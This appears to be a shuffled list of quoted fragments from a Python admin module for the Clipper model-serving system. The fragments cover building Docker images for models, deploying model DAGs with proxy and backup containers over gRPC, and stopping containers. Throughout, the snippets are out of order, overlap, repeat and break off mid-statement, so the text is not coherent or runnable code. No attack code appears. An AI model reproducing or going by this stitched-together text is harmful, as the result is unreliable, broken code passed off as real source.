%s %s %s %s %s\"%('1', name, version, 'old' ,", "StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)))", "tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size = df_contents.tell() df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) #", "# try: # query_frontend_url = \"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url", "count, backup_info[-1][2], \"22222\" )) self.logger.info('[DEPLOYMENT][Backup] Finished setting model info to", "For each entry in the dict, the key is a", "for this instance. On error, the string will be an", "and the value is a list of model Raises ------", "name and the value is a list of model Raises", "%s\"%(proxy_ip, \"22223\", container_name, count, container_ip, \"22222\" )) self.logger.info('[DEPLOYMENT] Finished setting", "def connect(self): \"\"\"Connect to a running Clipper cluster.\"\"\" self.cm.connect() self.connected", "%s \"%(\"localhost\",\"33333\", modelinfo)) return def deploy_DAG(self, name, version, dag_description=None, runtime=\"\"):", "version, # input_type, # image=image, # labels=labels, # batch_size=batch_size) self.logger.info(\"Done", "if not self.connected: raise UnconnectedException() image = self.build_model(name, version, model_data_path,", "name, version, model_data_path, base_image, container_registry=None, pkgs_to_install=None): version = str(version) _validate_versioned_model_name(name,", "DEFAULT_LABEL = [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR = \"/tmp/clipper\" #", "%s %s\"%(proxy_ip, \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT] Finished setting DAG for proxy", "Create build context tarfile with tarfile.TarFile( fileobj=context_file, mode=\"w\") as context_tar:", "setting DAG for proxy {proxy_name} '.format(proxy_name=tup[-1])) return def inspect_instance(self): \"\"\"Fetches", "Finished setting model info to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s", "to admin daemon\\n%s\"%(expanded_dag)) #tells the proxy runtime dag info for", "proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip]) if graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host =", ")) self.logger.info('[DEPLOYMENT][Backup] Finished setting model info to proxy') count +=", "the specified models. Parameters ---------- model_versions_dict : dict(str, list(str)) For", "clean up leftover Clipper model containers even if the Clipper", "deployment_regex = re.compile(deploy_regex_str) def _validate_versioned_model_name(name, version): if deployment_regex.match(name) is None:", "models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict): \"\"\"Stops the", "%s %s\"%(proxy_ip, \"22223\", container_name, count, container_ip, \"22222\" )) self.logger.info('[DEPLOYMENT] Finished", "%s %s\"%(container_ip, \"22222\", proxy_name, \"22223\")) # self.logger.info('[DEPLOYMENT] Finished setting proxy", "management_pb2 from .rpc import management_pb2_grpc from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter", "\"Invalid value: {name}: a model name must be a valid", "def deploy_model(self, name, version, input_type, image, labels=None, num_replicas=1, batch_size=-1): if", "tag=image) for b in build_logs: if 'stream' in b and", "frontend Docker containers and all model containers. If you started", "if m[\"model_name\"] in model_names: # if m[\"model_name\"] in model_dict: #", "address or hostname. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for", "model Docker image to {}\".format(image)) for line in docker_client.images.push(repository=image, stream=True):", "beginning of file for reading context_file.seek(0) image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier,", "= self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name, backup_proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip, backup_host)", "backup_info[-1][3], \"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to model')", ":py:exc:`clipper.UnconnectedException` \"\"\" # if not self.connected: # raise UnconnectedException() #", "pip install'.split( ' ') run_cmd = ' '.join(run_as_lst + pkgs_to_install)", "the string will be an error message (not JSON formatted).", "df_contents = StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path,", "runtime=\"\"): if not self.connected: raise UnconnectedException() # model_info = self.get_all_models()", "for proxy {proxy_name} '.format(proxy_name=tup[-1])) return def inspect_instance(self): \"\"\"Fetches performance metrics", "# Seek back to beginning of file for reading context_file.seek(0)", "mgmt_frontend_url)]: # r = requests.get(url, timeout=5) # if r.status_code !=", "self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(backup_info[-1][2], \"22222\", backup_info[-1][3], \"22223\")) #", "str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\". format( container_name=base_image, data_path=model_data_path, run_command=run_cmd))) df_tarinfo", "without calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model", "dag_description, labels): if not self.connected: raise UnconnectedException() def build_and_deploy_model(self, name,", "%s %s %s %s %s %s %s\"%('1', name, version, 'old'", "base_image, container_registry, pkgs_to_install) self.deploy_model(name, version, input_type, image, labels, num_replicas, batch_size)", "build-essential && pip install'.split( ' ') run_cmd = ' '.join(run_as_lst", "modelinfo = management_pb2.ModelInfo(modelname=model_name, modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel", "\"\"\" def get_query_addr(self): \"\"\"Get the IP address at which the", "each version of each model will be stopped. \"\"\" if", "pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops all model containers serving stale", "UnconnectedException() return self.cm.get_query_addr() def stop_models(self, model_names): \"\"\"Stops all versions of", "modelversion=model_version, image=image, inputtype=input_type, outputtype=output_type, stateful=stateful).SerializeToString() self.cm.grpc_client(\"zsxhku/grpcclient\", \"--addmodel %s %s %s", "version, input_type, model_data_path, base_image, labels=None, container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if", "setting proxy info to model') runtime_dag_id = name+version+str(1) ## Starting", "value: {version}: a model version must be a valid DNS-1123", "\"--setproxy %s %s %s %s\"%(backup_info[-1][2], \"22222\", backup_info[-1][3], \"22223\")) # self.logger.info('[DEPLOYMENT][Backup]", "as e: self.logger.warning(\"Error starting Clipper: {}\".format(e.msg)) raise e def connect(self):", "of file for reading context_file.seek(0) image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name,", "and management frontend Docker containers and all model containers. If", "model_info = self.get_all_models(verbose=True) # model_dict = {} # for m", "df_contents) except TypeError: df_contents = StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path} /model/\\n\".", "container_manager #############TEST################ self.runtime_dag = \"\" self.lock = False ################################# self.logger", "def connect_host(self, host_ip, host_port): self.cm.connect_host(host_ip, \"2375\") def add_model(self, model_name, model_version,", "json import pprint import time import re import os import", "dict(str, list(str)) For each entry in the dict, the key", "commands. This method can be used to clean up leftover", "leave containers serving version 3 untouched. Parameters ---------- model_names :", "for m in model_info: # if m[\"model_name\"] in model_names: #", "check failed\".format(name=name, url=url)) # break # except RequestException as e:", "= [m[\"model_version\"]] # self.cm.stop_models(model_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info(", "%s\"%(backup_info[-1][2], \"22222\", backup_info[-1][3], \"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info", "# self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(backup_info[-1][2], \"22222\", backup_info[-1][3], \"22223\"))", "backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id) backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else:", "in model_info: # if m[\"model_name\"] in model_names: # if m[\"model_name\"]", "via Clipper admin commands. This method can be used to", "proxy_info = [] backup_info = [] count = 1 for", "ClusterAdapter(logger, { 'cluster_name': self.cm.cluster_identifier }) def start_clipper(self, mgmt_frontend_image='{}/management_frontend:{}'.format( __registry__, __version__),", "\" \"an alphanumeric character (e.g. 'example.com', regex used for \"", "%s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy {proxy_name}", "'' if pkgs_to_install: run_as_lst = 'RUN apt-get -y install build-essential", "in model_info: # if m[\"model_name\"] in model_names and not m[\"is_current_version\"]:", "the specified versions of the specified models. Parameters ---------- model_versions_dict", "any containers serving versions 1 and 2 but will leave", "CLIPPER_TEMP_DIR = \"/tmp/clipper\" # Used Internally for Test; Not Windows", "__registry__, __version__), cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES): try: self.cm.start_clipper(mgmt_frontend_image) # while True: # try:", "= [] count = 1 for model_info in nodes_list: model_name,model_version,model_image", "self.cm.stop_models(model_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped all", "num_replicas=1, batch_size=-1, pkgs_to_install=None): if not self.connected: raise UnconnectedException() image =", "message (not JSON formatted). Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def", "self.cm.stop_models(model_versions_dict) # pp = pprint.PrettyPrinter(indent=4) # self.logger.info( # \"Stopped all", "import os import tarfile import sys from cloudpickle import CloudPickler", "try: self.cm.start_clipper(mgmt_frontend_image) # while True: # try: # query_frontend_url =", "# mgmt_frontend_url = \"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for name, url", "a valid DNS-1123 \" \" subdomain. It must consist of", "DAG for proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the backups runtime dag", "frontend can be reached request predictions. Returns ------- str The", "Docker Kill if it's in the Docker Mode. This parameter", "container_id, 0.3, 20) #self.cm.check_container_status(host, proxy_id, 0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\",", "{name}:{version}.\".format( name=name, version=version)) def connect_host(self, host_ip, host_port): self.cm.connect_host(host_ip, \"2375\") def", "dag info for tup in backup_info: if tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag", "= \"/tmp/clipper\" # Used Internally for Test; Not Windows Compatible", "current set of metrics for this instance. On error, the", "with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file: # Create build context", "model name must be a valid DNS-1123 \" \" subdomain.", "in backup_info: if tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(tup[-1], \"22223\",", "---------- model_names : list(str) A list of model names. All", "Docker Mode. This parameter will take not effect in Kubernetes.", "proxy runtime dag info for tup in proxy_info: proxy_name =", "'-' or '.', and must start and end with \"", "raise UnconnectedException() version = str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name, version=version,", "= str(version) _validate_versioned_model_name(name, version) run_cmd = '' if pkgs_to_install: run_as_lst", "is a model name and the value is a list", "= \"{reg}/{image}\".format( reg=container_registry, image=image) docker_client = docker.from_env() self.logger.info( \"Building model", "Returns ------- str The JSON string containing the current set", "backup_id, backup_host)) backup_ip = self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name, backup_proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\",", "pickle import numpy as np from google.protobuf.json_format import MessageToDict if", "model_info = self.get_all_models() dag_description_ = dag_description #self.logger.info(\"dag_description: %s\"%(dag_description_)) #if(dag_description==None): #", "address as an IP address or hostname. Raises ------ :py:exc:`clipper.UnconnectedException`", "StringIO import StringIO PY3 = False else: from io import", "the tar file # Seek back to beginning of file", "of each model will be stopped. \"\"\" if not self.connected:", "backup_host = self.cm.add_replica(model_name, model_version, \"22222\", model_image) self.logger.info(\"[Backup] Started %s with", "apt-get -y install build-essential && pip install'.split( ' ') run_cmd", "'RUN apt-get -y install build-essential && pip install'.split( ' ')", "\"validation is '{reg}'\".format( version=version, reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self, container_manager):", "proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host) ## get the ip", "self.logger.warning(\"Error starting Clipper: {}\".format(e.msg)) raise e def connect(self): \"\"\"Connect to", "as e: # self.logger.info(\"Clipper still initializing: \\n {}\".format(e)) # time.sleep(1)", "\"--addmodel %s %s %s \"%(\"localhost\",\"33333\", modelinfo)) return def deploy_DAG(self, name,", "{}\".format(e.msg)) raise e def connect(self): \"\"\"Connect to a running Clipper", "Mode. This parameter will take not effect in Kubernetes. \"\"\"", "proxy_id) proxy_info.append([proxy_name,proxy_id,proxy_ip]) container_info.append([container_name, container_id, container_ip]) if graph_parser.is_stateful(model_info): backup_name, backup_id, backup_host", "method to avoid the need to explicitly list all versions", "backup_info, frontend_info) self.runtime_dag = expanded_dag # TODO: need to modularize", "All replicas of all versions of each model specified in", "= tup[0] proxy_id = tup[1] proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag", "df_contents.seek(0) context_tar.addfile(df_tarinfo, df_contents) # Exit Tarfile context manager to finish", "# format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', # datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger", "m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: # model_dict[m[\"model_name\"]] =", "to proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s", "container_registry=None, num_replicas=1, batch_size=-1, pkgs_to_install=None): if not self.connected: raise UnconnectedException() image", "address at which the query frontend can be reached request", "numpy as np from google.protobuf.json_format import MessageToDict if sys.version_info <", "# pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops all model containers serving", "pkgs_to_install) with tempfile.NamedTemporaryFile( mode=\"w+b\", suffix=\"tar\") as context_file: # Create build", "datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig( # format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', #", "for proxy {proxy_name} '.format(proxy_name=proxy_name)) #tells the backups runtime dag info", "\"http://{host}/admin/ping\".format( # host=self.cm.get_admin_addr()) # for name, url in [('query frontend',", "# raise UnconnectedException() # model_info = self.get_all_models(verbose=True) # model_dict =", "model containers. If you started Redis independently, this will not", "is running\") self.connected = True except ClipperException as e: self.logger.warning(\"Error", "ClusterAdapter from .exceptions import ClipperException, UnconnectedException from .version import __version__,", "and 3 of model \"music_recommender\" and version 3 is the", "DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR = \"/tmp/clipper\" # Used Internally for", "proxy {proxy_name} '.format(proxy_name=tup[-1])) return def inspect_instance(self): \"\"\"Fetches performance metrics from", ".container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from .exceptions import ClipperException, UnconnectedException from", "except RequestException as e: # self.logger.info(\"Clipper still initializing: \\n {}\".format(e))", "model_names : list(str) The names of the models whose old", "%s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2], \"22222\" )) self.logger.info('[DEPLOYMENT][Backup]", "# Exit Tarfile context manager to finish the tar file", "avoid the need to explicitly list all versions of a", "host) ## get the ip of the instances proxy_ip =", "frontend_container_id, frontend_ip] self.logger.info(\"[DEPLOYMENT] ################ Started Frontend #################\") #expand the dag", "You almost certainly want to use one of the other", "self.cm.get_query_addr())) def build_and_deploy_DAG(self, name, version, dag_description, labels): if not self.connected:", "# dag_description_=self.get_dag_description() nodes_list = graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info =", "model Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each version", "import sys from cloudpickle import CloudPickler import pickle import numpy", "in model_names: # if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) #", "r.status_code != requests.codes.ok: # raise RequestException( # \"{name} end point", "\"Successfully connected to Clipper cluster at {}\".format( self.cm.get_query_addr())) def build_and_deploy_DAG(self,", "file # Seek back to beginning of file for reading", "(HOST:%s)\"%(model_name, container_name, container_id, host)) container_ip = self.cm.get_container_ip(host, container_id) proxy_name, proxy_id", "you specify them. You almost certainly want to use one", "pkgs_to_install=None): if not self.connected: raise UnconnectedException() image = self.build_model(name, version,", "model containers\") def stop_all(self, graceful=True): \"\"\"Stops all processes that were", "\" \"validation is '{reg}'\".format(name=name, reg=deploy_regex_str)) if deployment_regex.match(version) is None: raise", "error message (not JSON formatted). Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\"", "%(message)s', datefmt='%y-%m-%d:%H:%M:%S', level=logging.INFO) # logging.basicConfig( # format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',", "methods. Use with caution. \"\"\" # if not self.connected: #", "if pkgs_to_install: run_as_lst = 'RUN apt-get -y install build-essential &&", "valid DNS-1123 \" \" subdomain. It must consist of lower", "import management_pb2 from .rpc import management_pb2_grpc from .container_manager import CONTAINERLESS_MODEL_IMAGE,", "= self.build_model(name, version, model_data_path, base_image, container_registry, pkgs_to_install) self.deploy_model(name, version, input_type,", "from .rpc import management_pb2_grpc from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter from", "docker_client.images.build( fileobj=context_file, custom_context=True, tag=image) for b in build_logs: if 'stream'", "------ :py:exc:`clipper.UnconnectedException` \"\"\" # if not self.connected: # raise UnconnectedException()", "is None: raise ClipperException( \"Invalid value: {version}: a model version", "models. This is a convenience method to avoid the need", "num_replicas, batch_size) def build_model(self, name, version, model_data_path, base_image, container_registry=None, pkgs_to_install=None):", ":py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self): \"\"\"Get the IP address at which", "backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip]) else: backup_info.append([]) #self.cm.check_container_status(host, container_id, 0.3,", "serving versions 1 and 2 but will leave containers serving", "m in model_info: # if m[\"model_name\"] in model_names: # if", "parameter will take not effect in Kubernetes. \"\"\" self.cm.stop_all(graceful=graceful) self.logger.info(", "e def connect(self): \"\"\"Connect to a running Clipper cluster.\"\"\" self.cm.connect()", "from . import graph_parser DEFAULT_LABEL = [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432", "prediction_pb2 from .rpc import management_pb2 from .rpc import management_pb2_grpc from", "containers started via Clipper admin commands. This method can be", "model_names): \"\"\"Stops all versions of the specified models. This is", "%s %s %s %s %s %s\"%(proxy_ip, \"22223\", container_name, count, container_ip,", "sys.version_info < (3, 0): try: from cStringIO import StringIO except", "started via Clipper admin commands. This method can be used", "import requests from requests.exceptions import RequestException import json import pprint", "str(version) _validate_versioned_model_name(name, version) self.cm.deploy_model( name=name, version=version, input_type=input_type, image=image, num_replicas=num_replicas) #", "ClipperException( \"Invalid value: {version}: a model version must be a", "\"{name} end point {url} health check failed\".format(name=name, url=url)) # break", "each version of each model will be stopped. \"\"\" #", "model') # if(graph_parser.is_stateful(model_info)): # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy %s %s %s %s\"%(backup_info[-1][2],", "= container_manager #############TEST################ self.runtime_dag = \"\" self.lock = False #################################", "model info to proxy') count += 1 # self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setproxy", "name=name, version=version) if container_registry is not None: image = \"{reg}/{image}\".format(", "Clipper admin commands. This method can be used to clean", "ClipperException as e: self.logger.warning(\"Error starting Clipper: {}\".format(e.msg)) raise e def", "context_tar.addfile(df_tarinfo, df_contents) except TypeError: df_contents = StringIO( \"FROM {container_name}\\n{run_command}\\nCOPY {data_path}", "of the specified models. This is a convenience method to", "%s %s %s\"%(backup_info[-1][2], \"22222\", backup_info[-1][3], \"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished setting", "format( container_name=base_image, data_path=model_data_path, run_command=run_cmd)) df_tarinfo = tarfile.TarInfo('Dockerfile') df_contents.seek(0, os.SEEK_END) df_tarinfo.size", "self.logger.info( \"Building model Docker image with model data from {}\".format(", "labels=None, num_replicas=1, batch_size=-1): if not self.connected: raise UnconnectedException() version =", "UnconnectedException() def build_and_deploy_model(self, name, version, input_type, model_data_path, base_image, labels=None, container_registry=None,", "started Redis independently, this will not affect Redis. It can", "for these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops", "1, 2, and 3 of model \"music_recommender\" and version 3", "batch_size=batch_size) self.logger.info(\"Done deploying model {name}:{version}.\".format( name=name, version=version)) def connect_host(self, host_ip,", "#self.cm.check_container_status(host, proxy_id, 0.3, 20) #time.sleep(25) #self.logger.info(\"proxy_ip:%s\"%(proxy_ip)) self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s", "of model names. All replicas of all versions of each", "container_name, container_id, host = self.cm.add_replica(model_name, model_version, \"22222\", model_image, runtime=runtime) self.logger.info(\"Started", "stopped. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All replicas for each version", "tup[1] proxy_ip = tup[2] self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(proxy_ip, \"22223\",", "query_frontend_url = \"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format( #", "= [] DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432 CLIPPER_TEMP_DIR = \"/tmp/clipper\" # Used", "if not self.connected: # raise UnconnectedException() # self.cm.stop_models(model_versions_dict) # pp", ": list(str) A list of model names. All replicas of", "consist of lower case \" \"alphanumeric characters, '-' or '.',", "{version}: a model version must be a valid DNS-1123 \"", "PY3 = True import grpc from .rpc import model_pb2_grpc from", "\"22223\", container_name, count, container_ip, \"22222\" )) self.logger.info('[DEPLOYMENT] Finished setting model", "all versions of each model specified in the list will", "batch_size=-1, pkgs_to_install=None): if not self.connected: raise UnconnectedException() image = self.build_model(name,", "reg=container_registry, image=image) docker_client = docker.from_env() self.logger.info( \"Building model Docker image", "Started Frontend #################\") #expand the dag description with the model/proxy", "container_ip = self.cm.get_container_ip(host, container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip,", "self.connected: raise UnconnectedException() image = self.build_model(name, version, model_data_path, base_image, container_registry,", "also be called without calling ``connect`` first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped", "RequestException as e: # self.logger.info(\"Clipper still initializing: \\n {}\".format(e)) #", "containing the current set of metrics for this instance. On", "datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger = logging.getLogger(__name__) deploy_regex_str = \"[a-z0-9]([-a-z0-9]*[a-z0-9])?\\Z\" deployment_regex", "and versions:\\n{}\".format( # pp.pformat(model_versions_dict))) def stop_inactive_model_versions(self, model_names): \"\"\"Stops all model", "name, url in [('query frontend', query_frontend_url), # ('management frontend', mgmt_frontend_url)]:", "self.cm.connect() self.connected = True self.logger.info( \"Successfully connected to Clipper cluster", "'.', and must start and end with \" \"an alphanumeric", "first. \"\"\" self.cm.stop_all_model_containers() self.logger.info(\"Stopped all Clipper model containers\") def stop_all(self,", "will stop any containers serving versions 1 and 2 but", "%(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', # datefmt='%y-%m-%d:%H:%M:%S', # level=logging.INFO) logger = logging.getLogger(__name__)", "count, container_ip, \"22222\" )) self.logger.info('[DEPLOYMENT] Finished setting model info to", "the list will be stopped. Raises ------ :py:exc:`clipper.UnconnectedException` versions. All", "names. All replicas of all versions of each model specified", "\"--setmodel %s %s %s %s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count,", "pprint import time import re import os import tarfile import", "from .rpc import model_pb2_grpc from .rpc import model_pb2 from .rpc", "%s %s %s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2], \"22222\" ))", "string will be an error message (not JSON formatted). Raises", "runtime dag info for tup in backup_info: if tup: self.cm.grpc_client(\"zsxhku/grpcclient\",", "self.cm.get_container_ip(backup_host, backup_id) backup_proxy_name, backup_proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", backup_name, backup_ip, backup_host) backup_proxy_ip=", "\"22222\", backup_info[-1][3], \"22223\")) # self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to", ".version import __version__, __registry__ from . import graph_parser DEFAULT_LABEL =", "proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host) ## get the", "import tempfile import requests from requests.exceptions import RequestException import json", "model_data_path, base_image, container_registry, pkgs_to_install) self.deploy_model(name, version, input_type, image, labels, num_replicas,", "context_file.seek(0) image = \"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry is", "The names of the models whose old containers you want", "\"{cluster}-{name}:{version}\".format( cluster=self.cm.cluster_identifier, name=name, version=version) if container_registry is not None: image", "import MessageToDict if sys.version_info < (3, 0): try: from cStringIO", "specified versions of the specified models. Parameters ---------- model_versions_dict :", "version=version, input_type=input_type, image=image, num_replicas=num_replicas) # self.register_model( # name, # version,", "Clipper model containers\") def stop_all(self, graceful=True): \"\"\"Stops all processes that", "def deploy_DAG(self, name, version, dag_description=None, runtime=\"\"): if not self.connected: raise", "= graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info = [] backup_info =", "context manager to finish the tar file # Seek back", "container_name, count, container_ip, \"22222\" )) self.logger.info('[DEPLOYMENT] Finished setting model info", "cluster. Returns ------- str The JSON string containing the current", "you started Redis independently, this will not affect Redis. It", "formatted). Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self): \"\"\"Get the", "self.deploy_model(name, version, input_type, image, labels, num_replicas, batch_size) def build_model(self, name,", "regex used for \" \"validation is '{reg}'\".format( version=version, reg=deploy_regex_str)) class", "= self.cm.get_container_ip(host, container_id) proxy_name, proxy_id = self.cm.set_proxy(\"mxschen/ai-proxy:latest\", container_name, container_ip, host)", "labels=labels, # batch_size=batch_size) self.logger.info(\"Done deploying model {name}:{version}.\".format( name=name, version=version)) def", "tup: self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setdag %s %s %s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished", "self.cm.stop_all(graceful=graceful) self.logger.info( \"Stopped all Clipper cluster and all model containers\")", "(e.g. 'example.com', regex used for \" \"validation is '{reg}'\".format(name=name, reg=deploy_regex_str))", "# pp.pformat(model_dict))) def stop_versioned_models(self, model_versions_dict): \"\"\"Stops the specified versions of", "model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`. Parameters ---------- model_names : list(str) A", "(not JSON formatted). Raises ------ :py:exc:`clipper.UnconnectedException` :py:exc:`clipper.ClipperException` \"\"\" def get_query_addr(self):", "%s %s %s \"%(\"localhost\",\"33333\", modelinfo)) return def deploy_DAG(self, name, version,", "level=logging.INFO) # logging.basicConfig( # format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s', # datefmt='%y-%m-%d:%H:%M:%S',", "query and management frontend Docker containers and all model containers.", "# if m[\"model_name\"] in model_dict: # model_dict[m[\"model_name\"]].append(m[\"model_version\"]) # else: #", "model \"music_recommender\" and version 3 is the current version:: clipper_conn.stop_inactive_model_versions([\"music_recommender\"])", "# query_frontend_url = \"http://{host}/metrics\".format( # host=self.cm.get_query_addr()) # mgmt_frontend_url = \"http://{host}/admin/ping\".format(", "each version of each model will be stopped. Note ----", "in model_names and not m[\"is_current_version\"]: # if m[\"model_name\"] in model_dict:", "%s %s\"%(tup[-1], \"22223\", expanded_dag)) self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy", "return self.cm.get_query_addr() def stop_models(self, model_names): \"\"\"Stops all versions of the", "# From https://stackoverflow.com/a/740854/814642 try: df_contents = StringIO( str.encode( \"FROM {container_name}\\n{run_command}\\nCOPY", "self.lock = False ################################# self.logger = ClusterAdapter(logger, { 'cluster_name': self.cm.cluster_identifier", "################ Started Frontend #################\") #expand the dag description with the", "to avoid the need to explicitly list all versions of", "version=version, reg=deploy_regex_str)) class ClipperConnection(object): def __init__(self, container_manager): self.connected = False", "%s %s\"%(backup_info[-1][-1], \"22223\", backup_info[-1][0], count, backup_info[-1][2], \"22222\" )) self.logger.info('[DEPLOYMENT][Backup] Finished", "and b['stream'] != '\\n': #log build steps only self.logger.info(b['stream'].rstrip()) self.logger.info(\"Pushing", "This includes the query and management frontend Docker containers and", "health check failed\".format(name=name, url=url)) # break # except RequestException as", "were started via Clipper admin commands. This includes the query", "or Redis has crashed. It can also be called without", "will be an error message (not JSON formatted). Raises ------", "proxy') if(graph_parser.is_stateful(model_info)): self.cm.grpc_client(\"zsxhku/grpcclient\", \"--setmodel %s %s %s %s %s %s\"%(backup_info[-1][-1],", "add_model(self, model_name, model_version, image, input_type=\"string\", output_type=\"string\", stateful=False): modelinfo = management_pb2.ModelInfo(modelname=model_name,", "nodes_list = graph_parser.get_all_nodes(dag_description_) container_info = [] proxy_info = [] backup_info", "containers and all model containers. If you started Redis independently,", "these models and versions:\\n{}\".format( # pp.pformat(model_dict))) def stop_all_model_containers(self): \"\"\"Stops all", "('management frontend', mgmt_frontend_url)]: # r = requests.get(url, timeout=5) # if", "container_registry, pkgs_to_install) self.deploy_model(name, version, input_type, image, labels, num_replicas, batch_size) def", "## Starting frontend frontend_name, frontend_container_id = self.cm.add_frontend(\"localhost\", \"mxschen/frontend\",runtime_dag_id, proxy_info[0][2], \"22223\",", "self.logger.info( # \"Stopped all containers for these models and versions:\\n{}\".format(", "import docker import tempfile import requests from 